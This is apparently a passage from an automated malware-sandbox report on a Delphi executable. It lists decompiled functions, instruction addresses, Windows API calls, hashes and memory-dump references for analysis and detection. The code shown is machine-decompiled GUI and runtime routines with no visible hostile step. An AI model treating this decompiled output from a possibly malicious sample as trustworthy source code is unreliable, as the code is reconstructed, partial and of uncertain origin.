                                                                        0x00409a8b
                                                                        0x00409a8c
                                                                        0x00409a8d
                                                                        0x00409a8e
                                                                        0x00409a94
                                                                        0x00409a95
                                                                        0x00409a9a
                                                                        0x00409a9d
                                                                        0x00409aa5
                                                                        0x00409aa8
                                                                        0x00409aad
                                                                        0x00409ab2
                                                                        0x00409ab7
                                                                        0x00409ac6
                                                                        0x00409aca
                                                                        0x00409ad5
                                                                        0x00409ae9
                                                                        0x00409aed
                                                                        0x00409af8
                                                                        0x00409afd
                                                                        0x00409afe
                                                                        0x00409b01
                                                                        0x00409b04
                                                                        0x00409b09
                                                                        0x00409b0e
                                                                        0x00409b13
                                                                        0x00409b18
                                                                        0x00409b18
                                                                        0x00409b20
                                                                        0x00409b23
                                                                        0x00409b3b
                                                                        0x00409b46
                                                                        0x00409b60
                                                                        0x00409b6b
                                                                        0x00409b70
                                                                        0x00409b71
                                                                        0x00409b74
                                                                        0x00409b77
                                                                        0x00409b7e
                                                                        0x00409b81
                                                                        0x00409b84
                                                                        0x00409b96

                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(00000000,00409B97,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409AA0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: LocaleThread
                                                                        • String ID: 4w@$<v@
                                                                        • API String ID: 635194068-2181857394
                                                                        • Opcode ID: 031ed5dcb529cad3d0294120807776f5ada001c53162cb20b0110185eb27f802
                                                                        • Instruction ID: 8564910674612e7aa7f8c9bef030902903e116a4d87ded3b75f7abf6dfca8640
                                                                        • Opcode Fuzzy Hash: 031ed5dcb529cad3d0294120807776f5ada001c53162cb20b0110185eb27f802
                                                                        • Instruction Fuzzy Hash: A0319871F001085BDB00DA95D881AAE77ADEBC8314F61807BFA09E7782D63DED018769
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004438EC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 71%
                                                                        			E004438EC(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __esi) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _t32;
				intOrPtr _t52;
				void* _t57;
				intOrPtr _t69;
				intOrPtr _t76;
				void* _t78;
				void* _t80;
				void* _t81;
				intOrPtr _t82;

				_t80 = _t81;
				_t82 = _t81 + 0xfffffff0;
				_t78 = __ecx;
				_t57 = __edx;
				_v8 = __eax;
				_v16 = E004242CC(1);
				_push(_t80);
				_push(0x4439eb);
				_push( *[fs:eax]);
				 *[fs:eax] = _t82;
				if( *((char*)(_v8 + 0x41)) == 0) {
					L3:
					_push(0);
					_push(E004436F8(_v8, _v16, _t57, __eflags));
					_t32 = E004436E8(_v8);
					L00426AA8();
					_v12 = _t32;
					__eflags = 0;
					_t69 = _t32;
					 *[fs:eax] = _t69;
					_push(0x4439f2);
					return E004035DC(_v16);
				} else {
					_t84 = _t78 - 0xffffffff;
					if(_t78 == 0xffffffff) {
						goto L3;
					} else {
						_v20 = E004242CC(1);
						 *[fs:eax] = _t82;
						 *((intOrPtr*)( *_v20 + 8))( *[fs:eax], 0x4439ad, _t80);
						E00425838(_v20, _t78);
						E0044351C(_v8);
						_push(E004436D8( *((intOrPtr*)( *_v20 + 0x68))()));
						_push(E004436F8(_v8, _v16, _t57, _t84));
						_t52 =  *((intOrPtr*)(_v8 + 0x3c));
						L00426AA8();
						_v12 = _t52;
						_t76 = _t52;
						 *[fs:eax] = _t76;
						_push(0x4439d5);
						return E004035DC(_v20);
					}
				}
			}
















                                                                        0x004438ed
                                                                        0x004438ef
                                                                        0x004438f4
                                                                        0x004438f6
                                                                        0x004438f8
                                                                        0x00443907
                                                                        0x0044390c
                                                                        0x0044390d
                                                                        0x00443912
                                                                        0x00443915
                                                                        0x0044391f
                                                                        0x004439b4
                                                                        0x004439b4
                                                                        0x004439c3
                                                                        0x004439c7
                                                                        0x004439cd
                                                                        0x004439d2
                                                                        0x004439d5
                                                                        0x004439d7
                                                                        0x004439da
                                                                        0x004439dd
                                                                        0x004439ea
                                                                        0x00443925
                                                                        0x00443925
                                                                        0x00443928
                                                                        0x00000000
                                                                        0x0044392e
                                                                        0x0044393a
                                                                        0x00443948
                                                                        0x00443952
                                                                        0x0044395a
                                                                        0x00443962
                                                                        0x00443979
                                                                        0x00443987
                                                                        0x0044398b
                                                                        0x0044398f
                                                                        0x00443994
                                                                        0x00443999
                                                                        0x0044399c
                                                                        0x0044399f
                                                                        0x004439ac
                                                                        0x004439ac
                                                                        0x00443928

                                                                        APIs
                                                                        • 734520C0.COMCTL32(?,00000000,00000000,?,00000000,004439EB), ref: 0044398F
                                                                        • 734520C0.COMCTL32(00000000,00000000,00000000,00000000,004439EB), ref: 004439CD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: 734520
                                                                        • String ID: DA
                                                                        • API String ID: 3632036016-2080325668
                                                                        • Opcode ID: ccd8e2105615a610abee5b20ed0fe88bc36b8bc16ea5897006935c09f0e991ca
                                                                        • Instruction ID: 32eae90527f60b3240dfe4ecec9ccfcab97337b482669b5735be93bbf68b5d75
                                                                        • Opcode Fuzzy Hash: ccd8e2105615a610abee5b20ed0fe88bc36b8bc16ea5897006935c09f0e991ca
                                                                        • Instruction Fuzzy Hash: 75318470B00215AFEB00EF6AC88295EB7F9FB49715B6144B6F414E73A1CB74AE00CB18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004499B4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 84keyboardCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 72%
                                                                        			E004499B4(intOrPtr __eax, void* __edx) {
				char _v8;
				signed short _v10;
				intOrPtr _v16;
				char _v17;
				char _v24;
				intOrPtr _t34;
				intOrPtr _t40;
				intOrPtr _t42;
				intOrPtr _t48;
				void* _t51;
				intOrPtr _t64;
				intOrPtr _t67;
				void* _t69;
				void* _t71;
				intOrPtr _t72;

				_t69 = _t71;
				_t72 = _t71 + 0xffffffec;
				_t51 = __edx;
				_v16 = __eax;
				_v10 =  *((intOrPtr*)(__edx + 4));
				if(_v10 == 0) {
					return 0;
				} else {
					if(GetKeyState(0x10) < 0) {
						_v10 = _v10 + 0x2000;
					}
					if(GetKeyState(0x11) < 0) {
						_v10 = _v10 + 0x4000;
					}
					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
						_v10 = _v10 + 0x8000;
					}
					_v24 =  *((intOrPtr*)(_v16 + 0x34));
					_t34 =  *0x496bf8; // 0x2170880
					E004268F8(_t34,  &_v24);
					_push(_t69);
					_push(0x449ab2);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					while(1) {
						_v17 = 0;
						_v8 = E004496B8(_v16, 2, _v10 & 0x0000ffff);
						if(_v8 != 0) {
							break;
						}
						if(_v24 == 0 || _v17 != 2) {
							_pop(_t64);
							 *[fs:eax] = _t64;
							_push(0x449ab9);
							_t40 =  *0x496bf8; // 0x2170880
							return E004268F0(_t40);
						} else {
							continue;
						}
						goto L14;
					}
					_t42 =  *0x496bf8; // 0x2170880
					E004268F8(_t42,  &_v8);
					_push(_t69);
					_push(0x449a87);
					_push( *[fs:eax]);
					 *[fs:eax] = _t72;
					_v17 = E00449860( &_v8, 0, _t69);
					_pop(_t67);
					 *[fs:eax] = _t67;
					_push(0x449a8e);
					_t48 =  *0x496bf8; // 0x2170880
					return E004268F0(_t48);
				}
				L14:
			}


















                                                                        0x004499b5
                                                                        0x004499b7
                                                                        0x004499bb
                                                                        0x004499bd
                                                                        0x004499c7
                                                                        0x004499d0
                                                                        0x00449acf
                                                                        0x004499d6
                                                                        0x004499e0
                                                                        0x004499e2
                                                                        0x004499e2
                                                                        0x004499f2
                                                                        0x004499f4
                                                                        0x004499f4
                                                                        0x004499fe
                                                                        0x00449a00
                                                                        0x00449a00
                                                                        0x00449a0c
                                                                        0x00449a12
                                                                        0x00449a17
                                                                        0x00449a1e
                                                                        0x00449a1f
                                                                        0x00449a24
                                                                        0x00449a27
                                                                        0x00449a2a
                                                                        0x00449a2a
                                                                        0x00449a3c
                                                                        0x00449a43
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00449a92
                                                                        0x00449a9c
                                                                        0x00449a9f
                                                                        0x00449aa2
                                                                        0x00449aa7
                                                                        0x00449ab1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00449a92
                                                                        0x00449a48
                                                                        0x00449a4d
                                                                        0x00449a54
                                                                        0x00449a55
                                                                        0x00449a5a
                                                                        0x00449a5d
                                                                        0x00449a6c
                                                                        0x00449a71
                                                                        0x00449a74
                                                                        0x00449a77
                                                                        0x00449a7c
                                                                        0x00449a86
                                                                        0x00449a86
                                                                        0x00000000

                                                                        APIs
                                                                        • GetKeyState.USER32(00000010), ref: 004499D8
                                                                        • GetKeyState.USER32(00000011), ref: 004499EA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: State
                                                                        • String ID:
                                                                        • API String ID: 1649606143-3916222277
                                                                        • Opcode ID: 94615d3298e6c2b1289478aca6bd501869d773b40b841513df6d38ea5f5749f1
                                                                        • Instruction ID: 784b168bbd6622d86c8817c47da5e1e24199c79018d4424b72d08e920171472a
                                                                        • Opcode Fuzzy Hash: 94615d3298e6c2b1289478aca6bd501869d773b40b841513df6d38ea5f5749f1
                                                                        • Instruction Fuzzy Hash: 7A31D670A04384EFEB11EFA6D81169FB7F5EB45304F9684BBE800B6291E7785E00D658
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00456CA0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 80threadwindowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 71%
                                                                        			E00456CA0(intOrPtr __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v9;
				char _v16;
				char _v20;
				intOrPtr _t36;
				long _t41;
				intOrPtr _t51;
				void* _t55;
				intOrPtr _t66;
				intOrPtr* _t67;
				intOrPtr _t68;
				void* _t74;
				void* _t75;
				intOrPtr _t76;

				_t74 = _t75;
				_t76 = _t75 + 0xfffffff0;
				_v16 = 0;
				_v20 = 0;
				_v8 = __eax;
				_push(_t74);
				_push(0x456dae);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				_t55 = E00456C1C(_v8);
				if( *((char*)(_v8 + 0x88)) != 0) {
					_t51 = _v8;
					_t79 =  *((intOrPtr*)(_t51 + 0x48));
					if( *((intOrPtr*)(_t51 + 0x48)) == 0) {
						E004571F4(_v8);
					}
				}
				E00454DA8(_t55,  &_v20);
				E00433724(_v20, 0,  &_v16, _t79);
				_t36 =  *0x496c04; // 0x2170d40
				E00456E5C(_t36, _v16, _t79);
				_v9 = 1;
				_push(_t74);
				_push(0x456d57);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				if( *((short*)(_v8 + 0xea)) != 0) {
					 *((intOrPtr*)(_v8 + 0xe8))();
				}
				if(_v9 != 0) {
					E00456BB8();
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_t41 = GetCurrentThreadId();
				_t67 =  *0x495c4c; // 0x496030
				if(_t41 ==  *_t67 && E0041C0B0() != 0) {
					_v9 = 0;
				}
				if(_v9 != 0) {
					WaitMessage();
				}
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E00456DB5);
				return E0040436C( &_v20, 2);
			}

















                                                                        0x00456ca1
                                                                        0x00456ca3
                                                                        0x00456cab
                                                                        0x00456cae
                                                                        0x00456cb1
                                                                        0x00456cb6
                                                                        0x00456cb7
                                                                        0x00456cbc
                                                                        0x00456cbf
                                                                        0x00456cca
                                                                        0x00456cd6
                                                                        0x00456cd8
                                                                        0x00456cdb
                                                                        0x00456cdf
                                                                        0x00456ce4
                                                                        0x00456ce4
                                                                        0x00456cdf
                                                                        0x00456cee
                                                                        0x00456cf9
                                                                        0x00456d01
                                                                        0x00456d06
                                                                        0x00456d0b
                                                                        0x00456d11
                                                                        0x00456d12
                                                                        0x00456d17
                                                                        0x00456d1a
                                                                        0x00456d28
                                                                        0x00456d39
                                                                        0x00456d39
                                                                        0x00456d43
                                                                        0x00456d48
                                                                        0x00456d48
                                                                        0x00456d4f
                                                                        0x00456d52
                                                                        0x00456d6c
                                                                        0x00456d71
                                                                        0x00456d79
                                                                        0x00456d84
                                                                        0x00456d84
                                                                        0x00456d8c
                                                                        0x00456d8e
                                                                        0x00456d8e
                                                                        0x00456d95
                                                                        0x00456d98
                                                                        0x00456d9b
                                                                        0x00456dad

                                                                        APIs
                                                                          • Part of subcall function 00456C1C: GetCursorPos.USER32 ref: 00456C25
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00456D6C
                                                                        • WaitMessage.USER32(00000000,00456DAE,?,?,?,004798C4), ref: 00456D8E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CurrentCursorMessageThreadWait
                                                                        • String ID: 0`I
                                                                        • API String ID: 535285469-2983702033
                                                                        • Opcode ID: fd7b748d22305817f75c0356da75bbd64efc841958b29063c3cd77700d717242
                                                                        • Instruction ID: 01c0c099075671609aed48f59db28b1b43af4afac0b60e9a9ce997fa6d685819
                                                                        • Opcode Fuzzy Hash: fd7b748d22305817f75c0356da75bbd64efc841958b29063c3cd77700d717242
                                                                        • Instruction Fuzzy Hash: 0731D830A04248DFDB11DFA5C846B9EB7F5EB45305FA284BAEC00A7352D7796E48CB19
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00424370, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 71%
                                                                        			E00424370(intOrPtr __eax, void* __edx, void* __edi) {
				intOrPtr _v8;
				char _v92;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t41;
				void* _t43;
				intOrPtr _t52;
				intOrPtr _t57;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t64;
				void* _t66;
				intOrPtr _t67;

				_t59 = __edi;
				_t64 = _t66;
				_t67 = _t66 + 0xffffffa8;
				_push(_t60);
				_t43 = __edx;
				_v8 = __eax;
				if(__edx == 0) {
					L2:
					_push(0x496a44);
					L004068AC();
					_push(_t64);
					_push(0x424428);
					_push( *[fs:eax]);
					 *[fs:eax] = _t67;
					if(_t43 == 0) {
						E00402EF0( &_v92, 0x54);
						E00424D94(_v8, _t43, 0, 0, _t59, _t60, 0, 0,  &_v92);
					} else {
						_t61 = _t43;
						E00423824( *((intOrPtr*)(_t61 + 0x28)));
						E00423828( *((intOrPtr*)(_v8 + 0x28)));
						 *((intOrPtr*)(_v8 + 0x28)) =  *((intOrPtr*)(_t61 + 0x28));
						 *((char*)(_v8 + 0x21)) =  *((intOrPtr*)(_t61 + 0x21));
						 *((intOrPtr*)(_v8 + 0x34)) =  *((intOrPtr*)(_t61 + 0x34));
						 *((char*)(_v8 + 0x38)) =  *((intOrPtr*)(_t61 + 0x38));
					}
					_pop(_t52);
					 *[fs:eax] = _t52;
					_push(E0042442F);
					_push(0x496a44);
					L004069F4();
					return 0;
				} else {
					_t57 =  *0x41e4f8; // 0x41e544
					if(E00403768(__edx, _t57) == 0) {
						_t41 = E00414AEC(_v8, _t43);
						return _t41;
					} else {
						goto L2;
					}
				}
			}


















                                                                        0x00424370
                                                                        0x00424371
                                                                        0x00424373
                                                                        0x00424377
                                                                        0x00424378
                                                                        0x0042437a
                                                                        0x0042437f
                                                                        0x00424396
                                                                        0x00424396
                                                                        0x0042439b
                                                                        0x004243a2
                                                                        0x004243a3
                                                                        0x004243a8
                                                                        0x004243ab
                                                                        0x004243b0
                                                                        0x004243f7
                                                                        0x0042440b
                                                                        0x004243b2
                                                                        0x004243b2
                                                                        0x004243b7
                                                                        0x004243c2
                                                                        0x004243cd
                                                                        0x004243d6
                                                                        0x004243df
                                                                        0x004243e8
                                                                        0x004243e8
                                                                        0x00424412
                                                                        0x00424415
                                                                        0x00424418
                                                                        0x0042441d
                                                                        0x00424422
                                                                        0x00424427
                                                                        0x00424381
                                                                        0x00424383
                                                                        0x00424390
                                                                        0x00424454
                                                                        0x0042445e
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00424390

                                                                        APIs
                                                                        • RtlEnterCriticalSection.KERNEL32(00496A44), ref: 0042439B
                                                                        • RtlLeaveCriticalSection.KERNEL32(00496A44,0042442F,00000000,00424428,?,00496A44), ref: 00424422
                                                                          • Part of subcall function 00424D94: RtlEnterCriticalSection.KERNEL32(00496A44,00000000,?,?), ref: 00424E37
                                                                          • Part of subcall function 00424D94: RtlLeaveCriticalSection.KERNEL32(00496A44,00424E82,00496A44,00000000,?,?), ref: 00424E75
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterLeave
                                                                        • String ID: DA
                                                                        • API String ID: 3168844106-2080325668
                                                                        • Opcode ID: 5d0da1682d0e5b429fc274aee8455fbd1da520e3d31fc12b12d033f2833a3ec8
                                                                        • Instruction ID: c0367e46b2f5dfdd1aae6d6533981f87ee97dc4ca3a2f4a29e9ac0bbf231dd87
                                                                        • Opcode Fuzzy Hash: 5d0da1682d0e5b429fc274aee8455fbd1da520e3d31fc12b12d033f2833a3ec8
                                                                        • Instruction Fuzzy Hash: B0210B347042459FCB10EF99D982A9EB7F5EF8C314BA141BAB805E7751CA38ED01DB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00449774, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00449774(void* __eax, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				intOrPtr* _t27;
				intOrPtr _t29;
				void* _t39;
				intOrPtr _t42;
				intOrPtr _t45;
				int _t50;
				void* _t51;

				_t51 = __eax;
				_t39 = 0;
				_t50 = E004496B8(__eax, 1, __edx);
				if(_t50 == 0) {
					if(( *(_t51 + 0x1c) & 0x00000010) == 0) {
						_t45 =  *0x445600; // 0x44564c
						if(E00403768(_t51, _t45) != 0) {
							E0044878C( *((intOrPtr*)(_t51 + 0x34)));
						}
					}
				} else {
					if(( *(_t50 + 0x1c) & 0x00000010) == 0) {
						E0044878C(_t50);
					}
					 *((intOrPtr*)( *_t50 + 0x44))();
					_t24 = E00448E24(_t50, _t39, 0, _t50, _t51);
					if((_t24 | E00449320(_t50, 0)) != 0) {
						E004467FC(_t50, 0);
					}
					_t27 =  *0x495ad0; // 0x496c04
					_t29 =  *((intOrPtr*)( *_t27 + 0x44));
					if(_t29 != 0) {
						_t42 = _t29;
						if( *((char*)(_t42 + 0x22f)) == 2 && _t50 ==  *((intOrPtr*)(_t42 + 0x258)) && SendMessageA( *(_t42 + 0x254), 0x234, 0, 0) != 0) {
							DrawMenuBar(E0043CC2C(_t42));
						}
					}
					_t39 = 1;
				}
				return _t39;
			}














                                                                        0x00449777
                                                                        0x00449779
                                                                        0x00449784
                                                                        0x00449788
                                                                        0x00449818
                                                                        0x0044981c
                                                                        0x00449829
                                                                        0x0044982e
                                                                        0x0044982e
                                                                        0x00449829
                                                                        0x0044978e
                                                                        0x00449792
                                                                        0x00449796
                                                                        0x00449796
                                                                        0x0044979f
                                                                        0x004497a6
                                                                        0x004497ba
                                                                        0x004497be
                                                                        0x004497be
                                                                        0x004497c3
                                                                        0x004497ca
                                                                        0x004497cf
                                                                        0x004497d7
                                                                        0x004497e0
                                                                        0x0044980b
                                                                        0x0044980b
                                                                        0x004497e0
                                                                        0x00449810
                                                                        0x00449810
                                                                        0x00449838

                                                                        APIs
                                                                        • SendMessageA.USER32 ref: 004497FA
                                                                        • DrawMenuBar.USER32(00000000,?,00000234,00000000,00000000), ref: 0044980B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: DrawMenuMessageSend
                                                                        • String ID: LVD
                                                                        • API String ID: 2625368238-462541549
                                                                        • Opcode ID: 9d3d48822c4483685cc29d77eb33797c0968a31a1f1403c72cd18c5fa7b84299
                                                                        • Instruction ID: cfaac2668dddabe2e03c8476e39bbb8de488bb8272c0d5f02b7a156072d18efa
                                                                        • Opcode Fuzzy Hash: 9d3d48822c4483685cc29d77eb33797c0968a31a1f1403c72cd18c5fa7b84299
                                                                        • Instruction Fuzzy Hash: AF117C307006404BEB21FF6E8C8576B67966F86308F58547AF804CB392DA79EC06A79D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00436968, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E00436968(void* __eflags, intOrPtr _a4) {
				char _v5;
				struct tagRECT _v21;
				struct tagRECT _v40;
				void* _t40;
				void* _t45;

				_v5 = 1;
				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
				_t45 = E00414264( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
				if(_t45 <= 0) {
					L5:
					_v5 = 0;
				} else {
					do {
						_t45 = _t45 - 1;
						_t40 = E00414208(_t44, _t45);
						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
							goto L4;
						} else {
							E00435F4C(_t40,  &_v40);
							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
								goto L4;
							}
						}
						goto L6;
						L4:
					} while (_t45 > 0);
					goto L5;
				}
				L6:
				return _v5;
			}








                                                                        0x00436971
                                                                        0x0043697e
                                                                        0x00436991
                                                                        0x00436995
                                                                        0x004369e5
                                                                        0x004369e5
                                                                        0x00436997
                                                                        0x00436997
                                                                        0x00436997
                                                                        0x004369a1
                                                                        0x004369a7
                                                                        0x00000000
                                                                        0x004369af
                                                                        0x004369b4
                                                                        0x004369c8
                                                                        0x004369df
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004369df
                                                                        0x00000000
                                                                        0x004369e1
                                                                        0x004369e1
                                                                        0x00000000
                                                                        0x00436997
                                                                        0x004369e9
                                                                        0x004369f2

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: Rect$EqualIntersect
                                                                        • String ID: @
                                                                        • API String ID: 3291753422-2766056989
                                                                        • Opcode ID: b9d5a125bf218a009a68829a8c95d56b8c1c78d079be63f4ef73db18c465e3ad
                                                                        • Instruction ID: 4b7c01e8749ac2bd4959e066d72cd119708752121d29ea447919de7842c2e686
                                                                        • Opcode Fuzzy Hash: b9d5a125bf218a009a68829a8c95d56b8c1c78d079be63f4ef73db18c465e3ad
                                                                        • Instruction Fuzzy Hash: 1B1106716042486BCB01DA6CC885BDFBBEC9F49318F044292FC04EB342CB79DD448794
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004717DC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 42%
                                                                        			E004717DC(char __edx, void* __edi, void* __esi) {
				char _v5;
				void* __ebx;
				void* __ecx;
				void* __ebp;
				void* _t12;
				signed int _t21;
				signed int _t22;
				signed int _t25;
				void* _t28;
				void* _t31;
				void* _t32;
				char _t33;
				signed int _t37;
				void* _t39;
				void* _t40;
				void* _t41;
				void* _t42;

				_t40 = __esi;
				_t39 = __edi;
				_t33 = __edx;
				if(__edx != 0) {
					_t42 = _t42 + 0xfffffff0;
					_t12 = E00403940(_t12, _t41);
				}
				_v5 = _t33;
				_t31 = _t12;
				E00438AC4(_t31, _t32, 0, _t39, _t40);
				E00435D68(_t31, GetSystemMetrics(2));
				E00435D8C(_t31, GetSystemMetrics(0x14));
				_t21 =  *(_t31 + 0x4c);
				_t37 = _t21;
				_t22 = _t21 >> 1;
				if(0 < 0) {
					asm("adc eax, 0x0");
				}
				E00435D8C(_t31, _t37 + _t22);
				 *((char*)(_t31 + 0x208)) = 1;
				 *((short*)(_t31 + 0x212)) = 0x64;
				 *((intOrPtr*)(_t31 + 0x214)) = 1;
				 *((char*)(_t31 + 0x228)) = 1;
				 *((char*)(_t31 + 0x229)) = 1;
				 *((char*)(_t31 + 0x21e)) = 1;
				_t25 =  *0x47188c; // 0x80
				 *(_t31 + 0x50) =  !_t25 &  *(_t31 + 0x50);
				_t28 = _t31;
				if(_v5 != 0) {
					E00403998(_t28);
					_pop( *[fs:0x0]);
				}
				return _t31;
			}




















                                                                        0x004717dc
                                                                        0x004717dc
                                                                        0x004717dc
                                                                        0x004717e3
                                                                        0x004717e5
                                                                        0x004717e8
                                                                        0x004717e8
